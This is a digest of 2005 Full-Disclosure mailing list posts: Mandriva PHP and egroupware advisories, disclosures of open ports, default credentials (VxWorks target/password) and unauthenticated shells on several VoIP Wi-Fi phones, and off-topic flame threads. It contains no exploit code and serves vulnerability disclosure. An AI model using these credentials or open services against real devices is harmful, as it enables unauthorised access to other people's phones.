[Full-disclosure] MDKSA-2005:213 - Updated php packages fix multiple vulnerabilities

[Mandriva Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:213
 http://www.mandriva.com/security/
 ___
 
 Package : php
 Date: November 16, 2005
 Affected: 10.1, 10.2, 2006.0, Corporate 2.1, Corporate 3.0,
   Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 A number of vulnerabilities were discovered in PHP:
 
 An issue with fopen_wrappers.c would not properly restrict access to
 other directories when the open_basedir directive included a trailing
 slash (CVE-2005-3054); this issue does not affect Corporate Server 2.1.
 
 An issue with the apache2handler SAPI in mod_php could allow an
 attacker to cause a Denial of Service via the session.save_path option
 in an .htaccess file or VirtualHost stanza (CVE-2005-3319); this issue
 does not affect Corporate Server 2.1.
 
 A Denial of Service vulnerability was discovered in the way that PHP
 processes EXIF image data which could allow an attacker to cause PHP
 to crash by supplying carefully crafted EXIF image data
 (CVE-2005-3353).
 
 A cross-site scripting vulnerability was discovered in the phpinfo()
 function which could allow for the injection of javascript or HTML
 content onto a page displaying phpinfo() output, or to steal data such
 as cookies (CVE-2005-3388).
 
 A flaw in the parse_str() function could allow for the enabling of
 register_globals, even if it was disabled in the PHP configuration
 file (CVE-2005-3389).
 
 A vulnerability in the way that PHP registers global variables during
 a file upload request could allow a remote attacker to overwrite the
 $GLOBALS array which could potentially lead the execution of arbitrary
 PHP commands.  This vulnerability only affects systems with
 register_globals enabled (CVE-2005-3390).
 
 The updated packages have been patched to address this issue.  Once the
 new packages have been installed, you will need to restart your Apache
 server using "service httpd restart" in order for the new packages to
 take effect ("service httpd2-naat restart" for MNF2).
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3054
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3319
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3353
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3388
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3389
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3390
 http://www.hardened-php.net/advisory_202005.79.html
 http://www.hardened-php.net/advisory_192005.78.html
 http://www.hardened-php.net/advisory_182005.77.html
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.1:
 3966e335bc3a2ae6dffbbc8e83575865  
10.1/RPMS/libphp_common432-4.3.8-3.6.101mdk.i586.rpm
 199fa9e0baf46bda77e660555626ed4e  
10.1/RPMS/php432-devel-4.3.8-3.6.101mdk.i586.rpm
 05ef30fa2004ffd60f4519fd41a444e3  10.1/RPMS/php-cgi-4.3.8-3.6.101mdk.i586.rpm
 fe48fbbb47b3bcdab5054ffdd2067b6a  10.1/RPMS/php-cli-4.3.8-3.6.101mdk.i586.rpm
 90b47f8c1515b5043d513db11d6607ca  10.1/SRPMS/php-4.3.8-3.6.101mdk.src.rpm

 Mandriva Linux 10.1/X86_64:
 9fe206e55dca158523dab0a85f1a5dec  
x86_64/10.1/RPMS/lib64php_common432-4.3.8-3.6.101mdk.x86_64.rpm
 d36a3e7f90980388196aa58b6dbb94af  
x86_64/10.1/RPMS/php432-devel-4.3.8-3.6.101mdk.x86_64.rpm
 416b3bacf2b57f1a9cae5ca172e39135  
x86_64/10.1/RPMS/php-cgi-4.3.8-3.6.101mdk.x86_64.rpm
 0c27298aadb7d0a847a93316ce4d9d57  
x86_64/10.1/RPMS/php-cli-4.3.8-3.6.101mdk.x86_64.rpm
 90b47f8c1515b5043d513db11d6607ca  
x86_64/10.1/SRPMS/php-4.3.8-3.6.101mdk.src.rpm

 Mandriva Linux 10.2:
 e972e5e5cadb586a390a39bffa1cb56e  
10.2/RPMS/libphp_common432-4.3.10-7.4.102mdk.i586.rpm
 c26646613d41a7f3e82b5d2d11c21b7c  
10.2/RPMS/php432-devel-4.3.10-7.4.102mdk.i586.rpm
 098e0a1e4b8b597bf95461fc085c037a  10.2/RPMS/php-cgi-4.3.10-7.4.102mdk.i586.rpm
 99f0eaa02942f7b6753309ca56979100  10.2/RPMS/php-cli-4.3.10-7.4.102mdk.i586.rpm
 7df363e2e2309ec26b40c3490a0d75ae  10.2/SRPMS/php-4.3.10-7.4.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 d9d33311690b0c5f69e3834a5ba6bc10  
x86_64/10.2/RPMS/lib64php_common432-4.3.10-7.4.102mdk.x86_64.rpm
 f5d2b45ace0ab4208ba911159a47e429  
x86_64/10.2/RPMS/php432-devel-4.3.10-7.4.102mdk.x86_64.rpm
 0c7e0acb3bd80a9a7220ecf919b3d795  
x86_64/10.2/RPMS/php-cgi-4.3.10-7.4.102mdk.x86_64.rpm
 7df6f5a5b19c07e9fa3d6851f210f847  
x86_64/10.2/RPMS/php-cli-4.3.10-7.4.102mdk.x86_64.rpm
 7df363e2e2309ec26b40c3490a0d75ae  
x86_64/10.2/SRPMS/php-4.3.10-7.4.102mdk.src.rpm

 Mandriva Linux 2006.0:
 826c36fdb07b7c341a39507b679e31a9  
2006.0/RPMS/libphp5_common5-5.0.4-9.1.20060mdk.i586.rpm
 2be5d91979fa3c8f77744a86fee8a423  
2006.0/RPMS/php-cgi-

[Full-disclosure] MOCM deadline

[mayhem]

thinkin' is interesting i'm forwarding hoping someone will find it
useful.

> Metro Olografix cultural telematics association, for the second edition
> of the MOCM (Metro Olografix Crypto Meeting) that will take place in
> Pescara approximately between the end of January and the beginning of
> February 2006, invites all those who may be interested in making a
> speech at the event to submit its description by email at the address
> [EMAIL PROTECTED] before December 15th, 2005.
> 
> Speeches firstly considered will be about:
> 
> - Study of cryptographic algorithms and cryptoanalysis techniques
> - Steganography and information hiding
> - Anonymization services
> - Innovative programs, systems or solutions using cryptographic techniques
> - Political, socio-cultural and legal aspects of the discussed topics
> - Analysis of "Webs of Trust"
> - Cryptography applications in the telecommunication networks field
> 
> Speeches about other particularly relevant topics will also be considered.
> 
> The authors will be immediately contacted, confirming the successful
> reception of the material they have sent. The list of the speeches
> selected for the event will be published by the first week of January.
> 
> Further information about the MOCM will be available on the association
> web site at the address www.olografix.org; alternatively, you may send
> your request by email at the address [EMAIL PROTECTED], specifying
> 'MOCM information request' in the subject.


-- 
Dan: Everybody wants to be happy. 
Larry: Depressives don't. They want to be unhappy to confirm they're
depressed. If they were happy they couldn't be depressed anymore. They'd
have to go out into the world and live. Which can be depressing.
https://www.recursiva.org - Key on pgp.mit.edu ID B88FE057

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Administrivia: Noise

[n3td3v]

## Security Community statement by n3td3v

As the real n3td3v I would like to join John Cartwright in his calls
for calm during this difficult time. Obviously on the date mentioned
where emotions were running high things were said that might not have
been appropriate in retrospect of events.

The carnage that followed in follow up threads have left the list in
an improper state, due to individuals creating mock web pages on their
server. It would be great if users of the list could move on with
topics of better natures to allow for better balancing of message flow
in respect of the proper reason the list exists.

I take full responsibility for sparking off the wave of secondary
threads and make my apologies to working professionals who have not
appreciated the influx of n3td3v related hatred threads being mass
produced by the lesser intellectual members of the list.

## Auto Responders this Winter

With this I would like to wish all decent members of the list who
never post and just observe proceedings a very merry happy holidays
during your festive breaks, which are upcoming in future weeks.

Just remember to change your settings at the grok.org.uk website, so
people posting to the list over the coming weeks, won't be attacked by
your auto-responder, "I'm out of office until January 10th" message.

## Outside Infulences

To finish up, outside contributory factors were involved with
behaviours set by myself on said date for outrage. Not everything you
see on list is the full picture of off list conditions and states of
mind with infulences of substances the user may have been taking a
part in consuming of inappropriate levels within the blood stream.

## Planned Suicide of n3td3v name

I have already finished destroying all respect the brand name "n3td3v"
ever had by plunging the credibility of the name into distribute
by acting in bad natures on this list.

I now look to removing n3td3v web site, n3td3v mailing list, n3td3v
blog, all n3td3v user accounts on the internet on Yahoo, MSN, Google,
Digg, C|NET and others, along with messenger and e-mail list contacts
of people.

The suicide of the n3td3v name is complete now, as was planned to
happen before the weekend, where events took place.

## Prior Notification was made

An e-mail was sent to Yahoo's core security team to notify them the
n3td3v name wasn't coming back and that an attempt to close it up
would be made over the weekend.

## Upcoming Security business ventures

I now annouce the death of n3td3v, as planned by myself and others, to
further allow the progression of a new site and direction of planned
security business being setup.

I will be around the security community on a professional capacity in
the future (As my real name), to better contribute to the security and
internet community.

## Coffin Nailed

R.I.P. n3td3v


On 11/15/05, John Cartwright <[EMAIL PROTECTED]> wrote:
> Hi
>
> If we could all make an effort to avoid further personal attacks I
> would appreciate it. Please resist the temptation to perpetutate the
> noise - I have mailed individuals privately about the current
> situation in an attempt to prevent further offtopic postings.
>
> As has been said before, every list member is entitled to an opinion,
> providing they are prepared to express it in a constructive manner. I
> do not wish to impose any moderation unless absolutely necessary.
>
> Cheers
> - John
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] freeftpd USER bufferoverflow

[ad]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

What a leet poc so 

- -Message d'origine-
De : [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] De la part de KF (lists)
Envoyé : mercredi 16 novembre 2005 14:31
À : full-disclosure@lists.grok.org.uk
Objet : re: [Full-disclosure] freeftpd USER bufferoverflow

The default configuration is not vulnerable unless the Logging option 
"Log events" is checked.

- -KF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2rc2 (MingW32)

iQIVAwUBQ3umVq+LRXunxpxfAQIEgxAAmdoKuVeoeFKatxwsxxmxUa8xDexwjc+O
ZZAVOTqOBHpC5dGCZOqrysFeUmTDXfS/2NGsqIGMAzUIn6/zX//RBI+eI0p/lXi1
UfDiMZKaQVLRCQ8yht6SB/VKqRc5pnU4vbsZQ6JqaO1+cP91+7xEWgUPH5ZNYB1N
NzdeRL5u5NG+vHOQbWIPpmRHMO8NdRX1cfmWhq7oUBDns6HnssSVorubQGNgKPCx
FVo2ZFJPY/m4EWBskgu7C9bn4Pxxadj8CsPr62ttc182vUyC8JcEXIvy1GNOGnvu
IJRmD69LxsZtTYnbA2NLTS9TAOCYJ1uJZvkY6UQEm11noo2d/XNxuOVyhmQFd3Uz
PaSXlfE9MRstcOMDKxDlNsBnCY/AgNF5/teutUucWUvegVUUeVwmk20ujTlzaYN3
xgB5c5RKK6rEWdFnv8WgzK1ozWgI7v7PjeXL3BH3zlalKpcM9R4l8NmecCbwpuVo
gUwdoD6aDZh/Sz99cZNZ+LAkbwW7hwe9Z4BJQOcAXcmmufajPYOp7iWgOShJiDZz
Mtge1B5wjLdiO0S+JxlXLG+bGO7vk8r1gAS0HW04Se2d5PwBpt1zMVPLPbDqohX0
dtlRbIVtJLOJ9vjoI8FyiU1iiL2SLV8ep2/QEnamqimUMn0IL0sDSUo82mMNwwll
b5+yUVkDg5E=
=5bnO
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Senao SI-680H VoIP Wifi phone undocumented open port

[Shawn Merdinger]

I disclosed today the following vulnerability at the 32nd CSI
conference in Washington, D.C.


Thanks,
Shawn Merdinger

===

VENDOR:
Senao

VENDOR NOTIFIED:
28 June, 2005

VENDOR RESPONSE:
None

PRODUCT:
Senao SI-680H VOIP WIFI Phone
http://www.senao.com/english/product/product_wired_dsl_1.asp?tp1id=03&tp2id=02&proid=000186

SOFTWARE VERSION:
Current Firmware Version 0.03.0839
Current Firmware Date 2005.04.20
Current BSP Version V 2_2_1/37 Feb 11 2005,12:26:46d
Hardware version 1.7.0

A.  VULNERABILITY TITLE:
Senao SI-680H VOIP WIFI phone undocumented open port UDP/17185

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
1. An udocumented open port, UDP/17185, VxWorks WDB remote debugging
(wdbrpc) is left in from development. This open port may allow an
attacker unauthenticated access to the phone's OS, perhaps yielding
sensitive information, creating opportunities for DoS, etc.

There appears to be no workaround to disabling this open port.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Zyxel P2000W (Version1) VoIP Wifi phone multiple vulnerabilties

[Shawn Merdinger]

I disclosed today the following vulnerabilities at the 32nd CSI
conference in Washington, D.C.


Thanks,
Shawn Merdinger

===
VENDOR:
Zyxel

PRODUCT:
Zyxel P2000W Version 1 VOIP WIFI Phone
http://www.zyxel.com/product/P2000W.php

SOFTWARE VERSION:
Wj.00.10
Feb 05 2005

VENDOR NOTIFIED:
28 June, 2005

VENDOR RESPONSE:
None

A.  VULNERABILITY TITLE:
Zyxel P2000W v.1 VOIP WIFI Phone undocumented port UDP/9090

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
The Zyxel P2000W v.1 VOIP WIFI phone has an undocumented port,
UDP/9090, that provides an unauthenticated attacker information about
the phone, specifically the phone's MAC address and software version
is returned upon connection. An attacker can use this vulnerabiltiy to
easily identiy the phone and software version. Also, the undocumented
open port may provide an avenue for DoS. There appears to be no
workaround for this issue.

B.  VULNERABILITY TITLE:
Zyxel P2000W v.1 VOIP WIFI Phone uses hardcoded DNS servers

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
The Zyxel P2000W v.1 VOIP WIFI phone uses hardcoded DNS servers located
in Taiwan for the phone's DNS configuration.

Primary DNS IP is 168.95.1.1 resolving to dns.hinet.net
Secondary DNS IP is 139.175.55.244 resolving to dns.seed.net.tw

This configuration places every ZyXel phone using this software at
risk of unintentional DoS if the DNS servers in Taiwan become
unavailable.  If the DNS servers are compromised, all Zyxel phone
users worldwide are vulnerable to being redirected to malicious SIP
servers, etc. For a temporary workaround users can manually input the
IP address of a known, trusted DNS server via the keyboard at each
phone start when configured for DHCP or PPOE, however, this will not
persist once the phone is restarted.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] UTstarcom F1000 VoIP Wifi phone multiple vulnerabilities

[Shawn Merdinger]

I disclosed today the following vulnerabilities at the 32nd CSI
conference in Washington, D.C.


Thanks,
Shawn Merdinger
===

VENDOR:
UTStarcom

VENDOR NOTIFIED:
27 June, 2005 via [EMAIL PROTECTED]

VENDOR RESPONSE:
None

PRODUCT:
UTStarcom F1000 VOIP WIFI Phone
http://www.utstar.com/Solutions/Handsets/WiFi/

SOFTWARE VERSION:
s2.0
VxWorks (for Hornet VoWifi, ARM946ES (LE)
Factory Firmware) version 5.5.1.
Kernel: WIND version 2.6.
Made on Apr 5 2005, 14:49:39.

A.  VULNERABILITY TITLE:
UTStarcom F1000 VoIP Wifi phone SNMP daemon has default public read
credentials and the daemon cannot be disabled

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
UTstarcom F1000 SNMP daemon default public credentials allows an
attacker with access to the phone's SNMP daemon to read the phone's
SNMP configuration. This can lead to sensitive information disclosure.
In addition, the daemon's read/write credentials cannot be changed,
nor can the daemon be disabled via the phone's physical interface
(i.e. via keypad input). During testing, the SNMP daemon appeared
consistently die when connecting via Snmpwalk, requiring rebooting the
phone in order to restore SNMP service.

B. VULNERABILITY TITLE:
UTstarcom F1000 VoIP Wifi Phone telnet server has known default
user/password credentials

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
The phone's operating system is Wind River's Vxworks. Default
credentials for this OS are publically known to be target/password.

By default, the telnet deamon is listening on the phone (TCP port 23)
providing WIFI network access to the phone's OS. Attackers can telnet
to the phone and gain access to the phone's Vxworks OS using the known
default credentials.

Impact is full access to the Vxworks OS, including debugging, direct
memory dumping/injection, read/write device, user and network
configuration files, enable/disable/restart services, remote reboot. 
For a workaround, the default login/password can be changed.

C. VULNERABILITY TITLE:
UTstarcom F1000 VoIP Wifi Phone rlogin (TCP/513) unauthenticated access

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
The phone's rlogin port TCP/513 is listening by default and requires
no authentication.  An attacker connecting to the phone via
telnet/netcat is dropped into a shell without any login.  The shell
provides an attacker full access to the Vxworks OS, including
debugging, direct memory dumping/injection, read/write device, user
and network configuration files, enable/disable/restart services,
remote reboot.

There appears to be no workaround as neither the service can be
disabled, nor can authentication to rlogin be enabled.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Hitachi IP5000 VoIP Wifi phone multiple vulnerabilities

[Shawn Merdinger]

I disclosed today the following vulnerabilities at the 32nd CSI
conference in Washington, D.C.


Thanks,
Shawn Merdinger

===
VENDOR:
Hitachi

PRODUCT:
Hitachi IP5000 VOIP WIFI Phone
http://www.wirelessip5000.com/

SOFTWARE VERSION:
v1.5.6

VENDOR NOTIFIED:
28 June, 2005

VENDOR RESPONSE:
None.  However, issues addressed at
http://www.hitachi-cable.co.jp/ICSFiles/infosystem/security/76659792_e.pdf

A.  VULNERABILITY TITLE:
Hitachi IP5000 VOIP WIFI Phone handset hardcoded administrator password

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
1.  The Hitachi VOIP WIFI phone handset has a default administrator
password of "" that the user enters in order to access
administrator functions when
programming the handset via the physical keys. This password appears to be
hardcoded and presents a physical vulnerability. If an attacker can physically
access the phone (borrow, phone rental scenario, theft, etc.) the attacker can
derive sensitive information and modify the phone's configuration. There
appears to be no workaround for this vulnerability.

B.  VULNERABILITY TITLE:
Hitachi IP5000 VOIP WIFI phone HTTP server vulnerabilities

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
The HTTP server (port TCP/8080) on the Hitachi IP5000 phone has two security
issues:

1. Improper information disclosure: The HTTP daemon default index page
discloses what the device is (Hitachi IP5000 phone), the phone software
versions, phone MAC address, IP address and routing information. An
attacker can use this to discover quickly what the device is and see if there
are any associated vulnerabilities. Also, the disclosure of the phone's
routing/gateway information can provide an attacker with information for a
DoS attack. An attacker does not need to authenticate to the phone to obtain
this information from the index page. Workaround is to disable the HTTP
server via the phone's physical interface or via the HTTP interface.

2. Web server default configuration does not require credentials to
authenticate.
This allows an attacker to access any of the various configuration pages of the
phone, changing the phone configuration, etc. Workaround is to disable the
HTTP server via the phone's physical interface or via the HTTP interface. The
phone user may also set a password via the HTTP interface. Note that the
password set page does not require the previous password (an attacker could
lock out a user if the initial password is not set), nor does it require the new
password to be entered twice (to avoid fat-fingering).

C.  VULNERABILITY TITLE:
Hitachi IP5000 VOIP WIFI Phone SNMP daemon vulnerabilities

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:

1. The Hitachi IP5000 VOIP WIFI phone SNMP v1/v2c daemon allows
read/write access to the phone's SNMP configuration using any credentials. An
attacker can use this vulnerability to access the phone's SNMP configuration,
potentially reading/writing/erasing sensitive information. There seems to be no
workaround as it appears that the SNMP daemon can neither be disabled, nor
can the SNMP daemon read/write strings be modified by the phone user.

D.  VULNERABILITY TITLE:
Hitachi IP5000 VOIP WIFI Phone undocumented port TCP/3390 Unidata Shell

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:

1.  The Hitachi IP5000 phone has a undocumented open port, TCP/3390, that
provides an unauthenticated attacker access to the Unidata Shell created upon
connection. This may allow an attacker to access sensitive information and
potentially impact the phone's operations in a DoS. As a workaround, there
appears to be no means to disable this port and service, so no workaroud
appears possible.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MDKSA-2005:212 - Updated egroupware packages to address phpldapadmin, phpsysinfo vulnerabilities

[Mandriva Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:212
 http://www.mandriva.com/security/
 ___
 
 Package : egroupware
 Date: November 16, 2005
 Affected: Corporate 3.0
 ___
 
 Problem Description:
 
 Egroupware contains embedded copies of several php based projects,
 including phpldapadmin and phpsysinfo. 
 
 Phpldapadmin before 0.9.6c allows remote attackers to gain anonymous
 access to the LDAP server, even when disable_anon_bind is set, via an
 HTTP request to login.php with the anonymous_bind parameter set.
 (CAN-2005-2654)
 
 Directory traversal vulnerability in welcome.php in phpLDAPadmin 0.9.6
 and 0.9.7 allows remote attackers to read arbitrary files via a ..
 (dot dot) in the custom_welcome_page parameter. (CAN-2005-2792)
 
 PHP remote code injection vulnerability in welcome.php in phpLDAPadmin
 0.9.6 and 0.9.7 allows remote attackers to execute arbitrary PHP code
 via the custom_welcome_page parameter. (CAN-2005-2793)
 
 Maksymilian Arciemowicz discovered several cross site scripting issues
 in  phpsysinfo, a PHP based host information application.
 (CAN-2005-0869, 0870)
 
 Christopher Kunz discovered that local variables in phpsysinfo get
 overwritten unconditionally and are trusted later, which could lead to
 the inclusion of arbitrary files. (CAN-2005-3347)
 
 Christopher Kunz discovered that user-supplied input in phpsysinfo is
 used unsanitised, causing a HTTP Response splitting problem.
 (CAN-2005-3348)
 
 The updated packages have new versions of these subsystems to correct
 these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2654
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2792
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2793
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0869
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0870
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3347
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3348
 ___
 
 Updated Packages:
 
 Corporate 3.0:
 ede368f20b1e00144278800d3b6bf468  
corporate/3.0/RPMS/egroupware-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 8260713a9c28f6f7c7b08630af98b80c  
corporate/3.0/RPMS/egroupware-addressbook-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 053e62d63d08566a51f5a4caed575920  
corporate/3.0/RPMS/egroupware-backup-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 9d2a654955fd2dc83f965366a2af77a0  
corporate/3.0/RPMS/egroupware-bookmarks-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 ee1d890db9e37afaa9ddd5caeab02223  
corporate/3.0/RPMS/egroupware-calendar-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 26ecafedde93c891562ed679f833f1f0  
corporate/3.0/RPMS/egroupware-comic-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 eecee2ff5e2c5beb36c4592235227d9d  
corporate/3.0/RPMS/egroupware-developer_tools-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 153f3f86f72b627c3f12eb44715a01fd  
corporate/3.0/RPMS/egroupware-email-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 3863031cfccf6ba411ae8965b4e13af0  
corporate/3.0/RPMS/egroupware-emailadmin-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 260713edaf667a6c0af01afe5cf1276f  
corporate/3.0/RPMS/egroupware-etemplate-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 a3ae6cc74fb5191f41a7e602741a  
corporate/3.0/RPMS/egroupware-felamimail-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 a95d31bb108a6126d3187af8c77c2164  
corporate/3.0/RPMS/egroupware-filemanager-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 772a8690091f509727ef70f6b363d6bf  
corporate/3.0/RPMS/egroupware-forum-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 e97692f7a5c888e4ea1a86236c9bd124  
corporate/3.0/RPMS/egroupware-ftp-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 c9a5f4a17bf1697e7eb5e1e6421a6ff3  
corporate/3.0/RPMS/egroupware-fudforum-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 d8a9513798c91e6cbd39667fa04784ff  
corporate/3.0/RPMS/egroupware-headlines-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 87f25244c8af456bf43c66650dbc05e6  
corporate/3.0/RPMS/egroupware-infolog-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 67fc3ed193d9e5a5b5e3d0ab4b3b21af  
corporate/3.0/RPMS/egroupware-jinn-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 0c4a7125fa56f7e2c62b37c0e9657fda  
corporate/3.0/RPMS/egroupware-messenger-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 7c59389b480bab742b74a7fa3c304e08  
corporate/3.0/RPMS/egroupware-news_admin-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 ccc1a38a19f371b24014c078fd270640  
corporate/3.0/RPMS/egroupware-phpbrain-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 4d08c9988a1a8b371dbb8e775f10ead5  
corporate/3.0/RPMS/egroupware-phpldapadmin-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 49e15a21e9649192aec8a094fbd6ba23  
corporate/3.0/RPMS/egroupware-phpsysinfo-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 449fc4f64a2684e801026551d10775a6  
corporate/3.0/RPMS/egroupware-polls-1.0-0.RC3.1.1.C30mdk.noarch

Re: [Full-disclosure] Database servers on XP and the curious flaw

[Dave King]

While it still may not be "millions of people" several products come
bundled with the desktop edition of SQL Server 2000, and I'm sure many
will come with SQL Server 2005 Express.  As far as I can tell by reading
the paper (but not testing it myself) these are probably vulnerable as
well if the configuration allows the guest account access to the database.

Dave King
http://www.thesecure.net

>
> To be honest I don't think we're talking millions of people. How many
> people at home run a fully fledged RDBMS on their XP systems? Very few
> I'd guess. Besides, Simple File Sharing is documented so MS are
> educating those willing to seek information.
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Database servers on XP and the curious flaw

[Eliah Kagan]

James Tucker wrote:
> Long day?

It will be.

-Eliah
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Was: n3td3v.com, now: C.Meinel

[Byron Sonne]

Please don't ever think to put the discussion on the level of personal
attacks. 


It's not an attack; it's karma. Also a way of looking after the community.


No one is interested, and it's only in the interests of that


I beg to differ.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Database servers on XP and the curious flaw

[James Tucker]

Long day?

> -Original Message-
> From: Eliah Kagan [mailto:[EMAIL PROTECTED]
> Sent: 16 November 2005 18:45
> To: [EMAIL PROTECTED]
> Cc: bugtraq@securityfocus.com;
> full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
> Subject: Re: [Full-disclosure] Database servers on XP and the
> curious flaw
>
> James Tucker wrote (off-list):
> > I think you mis-read the paper, this is NOT the fault of MS, who'se
> > DBS is NOT vulnerable due to PROPER authentication design
> with the host OS.
>
> Yeah, you're right. What am I saying...?
>
> Forget everything I just said in this thread...
>
> I apologize to everybody who read what I said before.
>
> -Eliah


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Database servers on XP and the curious flaw

[Eliah Kagan]

James Tucker wrote (off-list):
> I think you mis-read the paper, this is NOT the fault of MS, who'se DBS is 
> NOT vulnerable due to PROPER authentication
> design with the host OS.

Yeah, you're right. What am I saying...?

Forget everything I just said in this thread...

I apologize to everybody who read what I said before.

-Eliah
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Database servers on XP and the curious flaw

[Eliah Kagan]

David Litchfield wrote:
> Hi Eliah,
>
> >David Litchfield wrote:
> >> Hey all,
> >> I've just put up a paper on a curious flaw that appears when running a
>
> >My intent is not to MS-bash here, but perhaps Microsoft is to blame
> >for not educating people about this issue. (If they had, your paper
> >would be superfluous.)
>
> >Usually if millions of users are insecure because they don't know
> >something, someone is to blame.
>
> To be honest I don't think we're talking millions of people. How many people
> at home run a fully fledged RDBMS on their XP systems? Very few I'd guess.
> Besides, Simple File Sharing is documented so MS are educating those willing
> to seek information.
>
> Cheers,
> David
> http://www.databasesecurity.com/
> http://www.ngssoftware.com/

If I use an insecurely configured database for anything critical, I am
insecure. That's everybody at a company that runs such a server and
has it configured insecurely, every customer of the company who has
personal information stored in the server, etc. I think that amounts
to millions.

However, it is true that by saying that, I made the problem look more
widespread than it actually is, which is bad because it dilutes the
power of the term, "millions of users," so that when the next UPnP or
DCOM comes around, it will be more difficult to raise awareness about
it. For this, I apologize.

What I should say is, "usually, if millions of people are at risk of
having their information security compromised because a few people
don't know something they should, someone is to blame."

The fault is certainly distributed, and it's not all on MS's
shoulders. Come to think of it, if I (putting myself in the shoes of a
clueless network administrator) am running a database server with
simple file sharing enabled and not thinking about security, the fault
is probably mine.

But whoever's fault it is, I hope your paper moves people who don't
have their act together, to get it together.

-Eliah
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
